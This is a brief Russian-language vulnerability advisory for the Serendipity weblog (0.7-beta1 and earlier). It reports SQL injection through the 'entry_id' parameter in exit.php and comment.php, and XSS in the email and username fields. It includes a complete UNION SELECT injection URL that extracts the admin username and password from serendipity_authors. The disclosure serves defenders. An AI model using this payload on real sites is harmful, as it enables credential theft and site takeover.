Программа: Serendipity 0.7-beta1 и более ранние версии
Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
Файлы 'exit.php' и 'comment.php' не проверяют данные, представленные пользователем в параметре 'entry_id'. Удаленный пользователь может представить специально обработанное значение, чтобы внедрить Sql команды, которые будут выполнены на основной базе данных:
http://URL_to_Serendipity_Weblog/comment.php? serendipity[type]=trackbacks&serendipity[entry_id]
=0%20and%200%20union%20select%201,2,3,4,
username,password,7,8,9,0,1,2,3%20from%20
serendipity_authors%20where%20authorid=1%20/*
XSS обнаружен в полях email и 'username' в 'comment.php'.